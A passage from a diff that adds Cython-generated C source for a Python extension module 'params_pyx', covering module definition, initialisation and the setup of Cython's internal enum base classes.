CYTHON_PEP489_MULTI_PHASE_INIT + 0, /* m_size */ + #elif CYTHON_USE_MODULE_STATE + sizeof(__pyx_mstate), /* m_size */ + #else + -1, /* m_size */ + #endif + __pyx_methods /* m_methods */, + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_moduledef_slots, /* m_slots */ + #else + NULL, /* m_reload */ + #endif + #if CYTHON_USE_MODULE_STATE + __pyx_m_traverse, /* m_traverse */ + __pyx_m_clear, /* m_clear */ + NULL /* m_free */ + #else + NULL, /* m_traverse */ + NULL, /* m_clear */ + NULL /* m_free */ + #endif + }; + #ifdef __cplusplus +} /* anonymous namespace */ +#endif +#endif + +#ifndef CYTHON_NO_PYINIT_EXPORT +#define __Pyx_PyMODINIT_FUNC PyMODINIT_FUNC +#elif PY_MAJOR_VERSION < 3 +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" void +#else +#define __Pyx_PyMODINIT_FUNC void +#endif +#else +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" PyObject * +#else +#define __Pyx_PyMODINIT_FUNC PyObject * +#endif +#endif + + +#if PY_MAJOR_VERSION < 3 +__Pyx_PyMODINIT_FUNC initparams_pyx(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC initparams_pyx(void) +#else +__Pyx_PyMODINIT_FUNC PyInit_params_pyx(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC PyInit_params_pyx(void) +#if CYTHON_PEP489_MULTI_PHASE_INIT +{ + return PyModuleDef_Init(&__pyx_moduledef); +} +static CYTHON_SMALL_CODE int __Pyx_check_single_interpreter(void) { + #if PY_VERSION_HEX >= 0x030700A1 + static PY_INT64_T main_interpreter_id = -1; + PY_INT64_T current_id = PyInterpreterState_GetID(PyThreadState_Get()->interp); + if (main_interpreter_id == -1) { + main_interpreter_id = current_id; + return (unlikely(current_id == -1)) ? -1 : 0; + } else if (unlikely(main_interpreter_id != current_id)) + #else + static PyInterpreterState *main_interpreter = NULL; + PyInterpreterState *current_interpreter = PyThreadState_Get()->interp; + if (!main_interpreter) { + main_interpreter = current_interpreter; + } else if (unlikely(main_interpreter != current_interpreter)) + #endif + { + PyErr_SetString( + PyExc_ImportError, + "Interpreter change detected - this module can only be loaded into one interpreter per process."); + return -1; + } + return 0; +} +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *module, const char* from_name, const char* to_name, int allow_none) +#else +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *moddict, const char* from_name, const char* to_name, int allow_none) +#endif +{ + PyObject *value = PyObject_GetAttrString(spec, from_name); + int result = 0; + if (likely(value)) { + if (allow_none || value != Py_None) { +#if CYTHON_COMPILING_IN_LIMITED_API + result = PyModule_AddObject(module, to_name, value); +#else + result = PyDict_SetItemString(moddict, to_name, value); +#endif + } + Py_DECREF(value); + } else if (PyErr_ExceptionMatches(PyExc_AttributeError)) { + PyErr_Clear(); + } else { + result = -1; + } + return result; +} +static CYTHON_SMALL_CODE PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def) { + PyObject *module = NULL, *moddict, *modname; + CYTHON_UNUSED_VAR(def); + if (__Pyx_check_single_interpreter()) + return NULL; + if (__pyx_m) + return __Pyx_NewRef(__pyx_m); + modname = PyObject_GetAttrString(spec, "name"); + if (unlikely(!modname)) goto bad; + module = PyModule_NewObject(modname); + Py_DECREF(modname); + if (unlikely(!module)) goto bad; +#if CYTHON_COMPILING_IN_LIMITED_API + moddict = module; +#else + moddict = PyModule_GetDict(module); + if (unlikely(!moddict)) goto bad; +#endif + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "loader", "__loader__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "origin", "__file__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "parent", "__package__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "submodule_search_locations", "__path__", 0) < 0)) goto bad; + return module; +bad: + Py_XDECREF(module); + return NULL; +} + + +static CYTHON_SMALL_CODE int __pyx_pymod_exec_params_pyx(PyObject *__pyx_pyinit_module) +#endif +#endif +{ + int stringtab_initialized = 0; + #if CYTHON_USE_MODULE_STATE + int pystate_addmodule_run = 0; + #endif + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannyDeclarations + #if CYTHON_PEP489_MULTI_PHASE_INIT + if (__pyx_m) { + if (__pyx_m == __pyx_pyinit_module) return 0; + PyErr_SetString(PyExc_RuntimeError, "Module 'params_pyx' has already been imported. Re-initialisation is not supported."); + return -1; + } + #elif PY_MAJOR_VERSION >= 3 + if (__pyx_m) return __Pyx_NewRef(__pyx_m); + #endif + /*--- Module creation code ---*/ + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_m = __pyx_pyinit_module; + Py_INCREF(__pyx_m); + #else + #if PY_MAJOR_VERSION < 3 + __pyx_m = Py_InitModule4("params_pyx", __pyx_methods, 0, 0, PYTHON_API_VERSION); Py_XINCREF(__pyx_m); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #elif CYTHON_USE_MODULE_STATE + __pyx_t_1 = PyModule_Create(&__pyx_moduledef); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1, __pyx_L1_error) + { + int add_module_result = PyState_AddModule(__pyx_t_1, &__pyx_moduledef); + __pyx_t_1 = 0; /* transfer ownership from __pyx_t_1 to params_pyx pseudovariable */ + if (unlikely((add_module_result < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + pystate_addmodule_run = 1; + } + #else + __pyx_m = PyModule_Create(&__pyx_moduledef); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #endif + CYTHON_UNUSED_VAR(__pyx_t_1); + __pyx_d = PyModule_GetDict(__pyx_m); if (unlikely(!__pyx_d)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_d); + __pyx_b = PyImport_AddModule(__Pyx_BUILTIN_MODULE_NAME); if (unlikely(!__pyx_b)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_b); + __pyx_cython_runtime = PyImport_AddModule((char *) "cython_runtime"); if (unlikely(!__pyx_cython_runtime)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_cython_runtime); + if (PyObject_SetAttrString(__pyx_m, "__builtins__", __pyx_b) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if CYTHON_REFNANNY +__Pyx_RefNanny = __Pyx_RefNannyImportAPI("refnanny"); +if (!__Pyx_RefNanny) { + PyErr_Clear(); + __Pyx_RefNanny = __Pyx_RefNannyImportAPI("Cython.Runtime.refnanny"); + if (!__Pyx_RefNanny) + Py_FatalError("failed to import 'refnanny' module"); +} +#endif + __Pyx_RefNannySetupContext("__Pyx_PyMODINIT_FUNC PyInit_params_pyx(void)", 0); + if (__Pyx_check_binary_version() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pxy_PyFrame_Initialize_Offsets + __Pxy_PyFrame_Initialize_Offsets(); + #endif + __pyx_empty_tuple = PyTuple_New(0); if (unlikely(!__pyx_empty_tuple)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_bytes = PyBytes_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_bytes)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_unicode = PyUnicode_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_unicode)) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pyx_CyFunction_USED + if (__pyx_CyFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_FusedFunction_USED + if (__pyx_FusedFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Coroutine_USED + if (__pyx_Coroutine_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Generator_USED + if (__pyx_Generator_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_AsyncGen_USED + if (__pyx_AsyncGen_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_StopAsyncIteration_USED + if (__pyx_StopAsyncIteration_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + /*--- Library function declarations ---*/ + /*--- Threads initialization code ---*/ + #if defined(WITH_THREAD) && PY_VERSION_HEX < 0x030700F0 && defined(__PYX_FORCE_INIT_THREADS) && __PYX_FORCE_INIT_THREADS + PyEval_InitThreads(); + #endif + /*--- Initialize various global constants etc. ---*/ + if (__Pyx_InitConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + stringtab_initialized = 1; + if (__Pyx_InitGlobals() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if PY_MAJOR_VERSION < 3 && (__PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT) + if (__Pyx_init_sys_getdefaultencoding_params() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + if (__pyx_module_is_main_common__params_pyx) { + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_name_2, __pyx_n_s_main) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + } + #if PY_MAJOR_VERSION >= 3 + { + PyObject *modules = PyImport_GetModuleDict(); if (unlikely(!modules)) __PYX_ERR(0, 1, __pyx_L1_error) + if (!PyDict_GetItemString(modules, "common.params_pyx")) { + if (unlikely((PyDict_SetItemString(modules, "common.params_pyx", __pyx_m) < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + } + } + #endif + /*--- Builtin init code ---*/ + if (__Pyx_InitCachedBuiltins() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Constants init code ---*/ + if (__Pyx_InitCachedConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Global type/function init code ---*/ + (void)__Pyx_modinit_global_init_code(); + (void)__Pyx_modinit_variable_export_code(); + (void)__Pyx_modinit_function_export_code(); + if (unlikely((__Pyx_modinit_type_init_code() < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + (void)__Pyx_modinit_type_import_code(); + (void)__Pyx_modinit_variable_import_code(); + (void)__Pyx_modinit_function_import_code(); + /*--- Execution code ---*/ + #if defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) + if (__Pyx_patch_abc() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + + /* "EnumBase":10 + * cdef object __Pyx_OrderedDict + * + * if PY_VERSION_HEX >= 0x03060000: # <<<<<<<<<<<<<< + * __Pyx_OrderedDict = dict + * else: + */ + __pyx_t_2 = (PY_VERSION_HEX >= 0x03060000); + if (__pyx_t_2) { + + /* "EnumBase":11 + * + * if PY_VERSION_HEX >= 0x03060000: + * __Pyx_OrderedDict = dict # <<<<<<<<<<<<<< + * else: + * from collections import OrderedDict as __Pyx_OrderedDict + */ + __Pyx_INCREF((PyObject *)(&PyDict_Type)); + __Pyx_XGOTREF(__Pyx_OrderedDict); + __Pyx_DECREF_SET(__Pyx_OrderedDict, ((PyObject *)(&PyDict_Type))); + __Pyx_GIVEREF((PyObject *)(&PyDict_Type)); + + /* "EnumBase":10 + * cdef object __Pyx_OrderedDict + * + * if PY_VERSION_HEX >= 0x03060000: # <<<<<<<<<<<<<< + * __Pyx_OrderedDict = dict + * else: + */ + goto __pyx_L2; + } + + /* "EnumBase":13 + * __Pyx_OrderedDict = dict + * else: + * from collections import OrderedDict as __Pyx_OrderedDict # <<<<<<<<<<<<<< + * + * @cython.internal + */ + /*else*/ { + __pyx_t_3 = PyList_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_n_s_OrderedDict); + __Pyx_GIVEREF(__pyx_n_s_OrderedDict); + PyList_SET_ITEM(__pyx_t_3, 0, __pyx_n_s_OrderedDict); + __pyx_t_4 = __Pyx_Import(__pyx_n_s_collections, __pyx_t_3, 0); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_ImportFrom(__pyx_t_4, __pyx_n_s_OrderedDict); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_t_3); + __Pyx_XGOTREF(__Pyx_OrderedDict); + __Pyx_DECREF_SET(__Pyx_OrderedDict, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + __pyx_L2:; + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * cdef tuple state + * cdef object _dict + */ + __pyx_t_4 = __Pyx_CyFunction_New(&__pyx_mdef_8EnumBase_14__Pyx_EnumMeta_7__reduce_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Pyx_EnumMeta___reduce_cython, NULL, __pyx_n_s_EnumBase, __pyx_d, ((PyObject *)__pyx_codeobj__6)); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem((PyObject *)__pyx_ptype___Pyx_EnumMeta->tp_dict, __pyx_n_s_reduce_cython, __pyx_t_4) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + PyType_Modified(__pyx_ptype___Pyx_EnumMeta); + + /* "(tree fragment)":16 + * else: + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, state) + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * __pyx_unpickle___Pyx_EnumMeta__set_state(self, __pyx_state) + */ + __pyx_t_4 = __Pyx_CyFunction_New(&__pyx_mdef_8EnumBase_14__Pyx_EnumMeta_9__setstate_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Pyx_EnumMeta___setstate_cython, NULL, __pyx_n_s_EnumBase, __pyx_d, ((PyObject *)__pyx_codeobj__8)); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 16, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem((PyObject *)__pyx_ptype___Pyx_EnumMeta->tp_dict, __pyx_n_s_setstate_cython, __pyx_t_4) < 0) __PYX_ERR(1, 16, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + PyType_Modified(__pyx_ptype___Pyx_EnumMeta); + + /* "EnumBase":27 + * + * cdef object __Pyx_EnumBase + * class __Pyx_EnumBase(int, metaclass=__Pyx_EnumMeta): # <<<<<<<<<<<<<< + * def __new__(cls, value, name=None): + * for v in cls: + */ + __pyx_t_4 = PyTuple_New(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 27, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_INCREF((PyObject *)(&PyInt_Type)); + __Pyx_GIVEREF((PyObject *)(&PyInt_Type)); + PyTuple_SET_ITEM(__pyx_t_4, 0, ((PyObject *)(&PyInt_Type))); + __pyx_t_3 = __Pyx_PEP560_update_bases(__pyx_t_4); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 27, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_5 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 27, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = __Pyx_Py3MetaclassPrepare(((PyObject *)__pyx_ptype___Pyx_EnumMeta), __pyx_t_3, __pyx_n_s_Pyx_EnumBase, __pyx_n_s_Pyx_EnumBase, __pyx_t_5, __pyx_n_s_EnumBase, (PyObject *) NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 27, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (__pyx_t_3 != __pyx_t_4) { + if (unlikely((PyDict_SetItemString(__pyx_t_6, "__orig_bases__", __pyx_t_4) < 0))) __PYX_ERR(1, 27, __pyx_L1_error) + } + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "EnumBase":28 + * cdef object __Pyx_EnumBase + * class __Pyx_EnumBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): # <<<<<<<<<<<<<< + * for v in cls: + * if v == value: + */ + __pyx_t_4 = __Pyx_CyFunction_New(&__pyx_mdef_8EnumBase_14__Pyx_EnumBase_1__new__, __Pyx_CYFUNCTION_STATICMETHOD, __pyx_n_s_Pyx_EnumBase___new, NULL, __pyx_n_s_EnumBase, __pyx_d, ((PyObject *)__pyx_codeobj__10)); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 28, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_4, __pyx_tuple__11); + if (__Pyx_SetNewInClass(__pyx_t_6, __pyx_n_s_new, __pyx_t_4) < 0) __PYX_ERR(1, 28, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "EnumBase":39 + * cls.__members__[name] = res + * return res + * def __repr__(self): # <<<<<<<<<<<<<< + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): + */ + __pyx_t_4 = __Pyx_CyFunction_New(&__pyx_mdef_8EnumBase_14__Pyx_EnumBase_3__repr__, 0, __pyx_n_s_Pyx_EnumBase___repr, NULL, __pyx_n_s_EnumBase, __pyx_d, ((PyObject *)__pyx_codeobj__13)); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 39, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (__Pyx_SetNameInClass(__pyx_t_6, __pyx_n_s_repr, __pyx_t_4) < 0) __PYX_ERR(1, 39, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "EnumBase":41 + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): # <<<<<<<<<<<<<< + * return "%s.%s" % (self.__class__.__name__, self.name) + * + */ + __pyx_t_4 = __Pyx_CyFunction_New(&__pyx_mdef_8EnumBase_14__Pyx_EnumBase_5__str__, 0, __pyx_n_s_Pyx_EnumBase___str, NULL, __pyx_n_s_EnumBase, __pyx_d, ((PyObject *)__pyx_codeobj__14)); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 41, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (__Pyx_SetNameInClass(__pyx_t_6, __pyx_n_s_str, __pyx_t_4) < 0) __PYX_ERR(1, 41, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "EnumBase":27 + * + * cdef object __Pyx_EnumBase + * class __Pyx_EnumBase(int, metaclass=__Pyx_EnumMeta): # <<<<<<<<<<<<<< + * def __new__(cls, value, name=None): + * for v in cls: + */ + __pyx_t_4 = __Pyx_Py3ClassCreate(((PyObject *)__pyx_ptype___Pyx_EnumMeta), __pyx_n_s_Pyx_EnumBase, __pyx_t_3, __pyx_t_6, __pyx_t_5, 1, 0); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 27, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_XGOTREF(__Pyx_EnumBase); + __Pyx_DECREF_SET(__Pyx_EnumBase, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "EnumBase":44 + * return "%s.%s" % (self.__class__.__name__, self.name) + * + * if PY_VERSION_HEX >= 0x03040000: # <<<<<<<<<<<<<< + * from enum import IntEnum as __Pyx_EnumBase + * + */ + __pyx_t_2 = (PY_VERSION_HEX >= 0x03040000); + if (__pyx_t_2) { + + /* "EnumBase":45 + * + * if PY_VERSION_HEX >= 0x03040000: + * from enum import IntEnum as __Pyx_EnumBase # <<<<<<<<<<<<<< + * + * cdef object __Pyx_FlagBase + */ + __pyx_t_3 = PyList_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 45, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_n_s_IntEnum); + __Pyx_GIVEREF(__pyx_n_s_IntEnum); + PyList_SET_ITEM(__pyx_t_3, 0, __pyx_n_s_IntEnum); + __pyx_t_5 = __Pyx_Import(__pyx_n_s_enum, __pyx_t_3, 0); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 45, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_ImportFrom(__pyx_t_5, __pyx_n_s_IntEnum); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 45, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_t_3); + __Pyx_XGOTREF(__Pyx_EnumBase); + __Pyx_DECREF_SET(__Pyx_EnumBase, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "EnumBase":44 + * return "%s.%s" % (self.__class__.__name__, self.name) + * + * if PY_VERSION_HEX >= 0x03040000: # <<<<<<<<<<<<<< + * from enum import IntEnum as __Pyx_EnumBase + * + */ + } + + /* "EnumBase":48 + * + * cdef object __Pyx_FlagBase + * class __Pyx_FlagBase(int, metaclass=__Pyx_EnumMeta): # <<<<<<<<<<<<<< + * def __new__(cls, value, name=None): + * for v in cls: + */ + __pyx_t_5 = PyTuple_New(1); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_INCREF((PyObject *)(&PyInt_Type)); + __Pyx_GIVEREF((PyObject *)(&PyInt_Type)); + PyTuple_SET_ITEM(__pyx_t_5, 0, ((PyObject *)(&PyInt_Type))); + __pyx_t_3 = __Pyx_PEP560_update_bases(__pyx_t_5); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_6 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_4 = __Pyx_Py3MetaclassPrepare(((PyObject *)__pyx_ptype___Pyx_EnumMeta), __pyx_t_3, __pyx_n_s_Pyx_FlagBase, __pyx_n_s_Pyx_FlagBase, __pyx_t_6, __pyx_n_s_EnumBase, (PyObject *) NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (__pyx_t_3 != __pyx_t_5) { + if (unlikely((PyDict_SetItemString(__pyx_t_4, "__orig_bases__", __pyx_t_5) < 0))) __PYX_ERR(1, 48, __pyx_L1_error) + } + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "EnumBase":49 + * cdef object __Pyx_FlagBase + * class __Pyx_FlagBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): # <<<<<<<<<<<<<< + * for v in cls: + * if v == value: + */ + __pyx_t_5 = __Pyx_CyFunction_New(&__pyx_mdef_8EnumBase_14__Pyx_FlagBase_1__new__, __Pyx_CYFUNCTION_STATICMETHOD, __pyx_n_s_Pyx_FlagBase___new, NULL, __pyx_n_s_EnumBase, __pyx_d, ((PyObject *)__pyx_codeobj__15)); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 49, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_5, __pyx_tuple__16); + if (__Pyx_SetNewInClass(__pyx_t_4, __pyx_n_s_new, __pyx_t_5) < 0) __PYX_ERR(1, 49, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "EnumBase":62 + * cls.__members__[name] = res + * return res + * def __repr__(self): # <<<<<<<<<<<<<< + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): + */ + __pyx_t_5 = __Pyx_CyFunction_New(&__pyx_mdef_8EnumBase_14__Pyx_FlagBase_3__repr__, 0, __pyx_n_s_Pyx_FlagBase___repr, NULL, __pyx_n_s_EnumBase, __pyx_d, ((PyObject *)__pyx_codeobj__17)); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 62, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + if (__Pyx_SetNameInClass(__pyx_t_4, __pyx_n_s_repr, __pyx_t_5) < 0) __PYX_ERR(1, 62, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "EnumBase":64 + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): # <<<<<<<<<<<<<< + * return "%s.%s" % (self.__class__.__name__, self.name) + * + */ + __pyx_t_5 = __Pyx_CyFunction_New(&__pyx_mdef_8EnumBase_14__Pyx_FlagBase_5__str__, 0, __pyx_n_s_Pyx_FlagBase___str, NULL, __pyx_n_s_EnumBase, __pyx_d, ((PyObject *)__pyx_codeobj__18)); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 64, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + if (__Pyx_SetNameInClass(__pyx_t_4, __pyx_n_s_str, __pyx_t_5) < 0) __PYX_ERR(1, 64, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "EnumBase":48 + * + * cdef object __Pyx_FlagBase + * class __Pyx_FlagBase(int, metaclass=__Pyx_EnumMeta): # <<<<<<<<<<<<<< + * def __new__(cls, value, name=None): + * for v in cls: + */ + __pyx_t_5 = __Pyx_Py3ClassCreate(((PyObject *)__pyx_ptype___Pyx_EnumMeta), __pyx_n_s_Pyx_FlagBase, __pyx_t_3, __pyx_t_4, __pyx_t_6, 1, 0); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_XGOTREF(__Pyx_FlagBase); + __Pyx_DECREF_SET(__Pyx_FlagBase, __pyx_t_5); + __Pyx_GIVEREF(__pyx_t_5); + __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "EnumBase":67 + * return "%s.%s" % (self.__class__.__name__, self.name) + * + * if PY_VERSION_HEX >= 0x03060000: # <<<<<<<<<<<<<< + * from enum import IntFlag as __Pyx_FlagBase + * + */ + __pyx_t_2 = (PY_VERSION_HEX >= 0x03060000); + if (__pyx_t_2) { + + /* "EnumBase":68 + * + * if PY_VERSION_HEX >= 0x03060000: + * from enum import IntFlag as __Pyx_FlagBase # <<<<<<<<<<<<<< + * + */ + __pyx_t_3 = PyList_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 68, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_n_s_IntFlag); + __Pyx_GIVEREF(__pyx_n_s_IntFlag); + PyList_SET_ITEM(__pyx_t_3, 0, __pyx_n_s_IntFlag); + __pyx_t_6 = __Pyx_Import(__pyx_n_s_enum, __pyx_t_3, 0); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 68, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_ImportFrom(__pyx_t_6, __pyx_n_s_IntFlag); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 68, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_t_3); + __Pyx_XGOTREF(__Pyx_FlagBase); + __Pyx_DECREF_SET(__Pyx_FlagBase, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + + /* "EnumBase":67 + * return "%s.%s" % (self.__class__.__name__, self.name) + * + * if PY_VERSION_HEX >= 0x03060000: # <<<<<<<<<<<<<< + * from enum import IntFlag as __Pyx_FlagBase + * + */ + } + + /* "(tree fragment)":1 + * def 